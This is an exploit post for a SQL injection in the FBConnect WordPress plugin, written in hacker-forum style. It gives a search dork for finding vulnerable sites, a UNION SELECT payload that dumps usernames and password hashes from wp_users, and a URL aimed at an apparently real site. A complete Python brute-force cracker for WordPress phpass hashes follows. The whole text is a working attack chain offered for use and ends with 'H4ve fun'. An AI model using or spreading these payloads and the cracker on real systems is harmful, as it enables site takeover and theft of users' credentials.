Wordpress Sql Injection App : FBConnect WordPress Plugin Type : Sql-Injection Dork : inurl:"fbconnect_action=myhome" Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- Exemple: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users-- ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python): # code by : tdxev # website : www.tdxev.com # team : www.insecurity.ro # version : 2011.01.17 # documentation : /wp-includes/class-phpass.php import md5 import time # user settings wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made # app settings itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' # use by crypt_private def encode64 (textInput,count): output = '' i = 0 while i < count : i = i + 1 value = ord(textInput[i-1]) output = output + itoa64[value & 63] if i < count : value = value | ord(textInput[i]) << 8 output = output + itoa64[(value >> 6) & 63] i = i + 1 if i >= count: break if i < count: value = value | ord(textInput[i]) <<16 output = output + itoa64[(value >> 12) & 63] i = i + 1 if i >= count: break output = output + itoa64[(value >> 18) & 63] return output # generate wordpress hash def crypt_private (plainText, wordpressHash): output = '*0' # old type | not suported yet if wordpressHash[0:2] == output: output = '*1' if wordpressHash[0:3] != '$P$': # old type | not suported yet return output count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash if (count_log2 < 7) or (count_log2>30): return output count = 1 << count_log2 # get who many times will generate the hash salt = wordpressHash[4:12] # get salt from the wordpress hash if len(salt) != 8 : return output plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try for i in range (count): plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt) output = output + encode64(plainTextHash,16) # create the new hash return output # class that generate the words class wordGenerator (): def __init__(self, word, charSet): self.setCurretWord(word) # word to start self.setCharSet(charSet) # characther set used to generate the words # set current word def setCurretWord (self, word): self.currentWord = word # set the character set that will be used def setCharSet (self, charSet): self.charSet = charSet # generate the next word set that word as currentWord and retutn the word def nextWord (self): self.setCurretWord( self._incWord(self.currentWord) ) return self.currentWord # generate the next word def _incWord(self, word): word = str(word) # convert to string if word == '': # if word is empty return self.charSet[0] # return first char from the char set wordLastChar = word[len(word)-1] # get the last char wordLeftSide = word[0:len(word)-1] # get word without the last char lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set else: # it is the last char wordLastChar = self.charSet[0] # reset last chat to have first character from the char set wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased return wordLeftSide + wordLastChar # return the next word # check if is right type of hashs for wpHash in wpHashList: if wpHash[0:3] != '$P$': print "Wrong password type or password type is DES not impemented yet!" exit() # create a new wordGenerator newWord = wordGenerator ('',charSet); # word generator wordsFound = 0 exitLoop = False def found(hashItem, word): global wordsFound global exitLoop d = open(dumpFile,'a') # open file for append d.write(hashItem + ' = ' + word +"\n") # write the result d.close() # close file wordsFound = wordsFound + 1 # increase the number of hashs cracked print hashItem + ' = ' + word # display the word if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list exitLoop = True # rise flag to stop the loop and exit def setProgress(word) : d = open(progFile,'w') # open file for append d.write("Position :"+ word +"\n") # write the current word d.close() # close file count = 0 while exitLoop == False: word = newWord.nextWord() count = count + 1 #print word for wpHash in wpHashList: newHash = crypt_private(word,wpHash) if wpHash == newHash : found(newHash,word) if count == 1000 : count = 0 setProgress(word) H4ve fun :D:D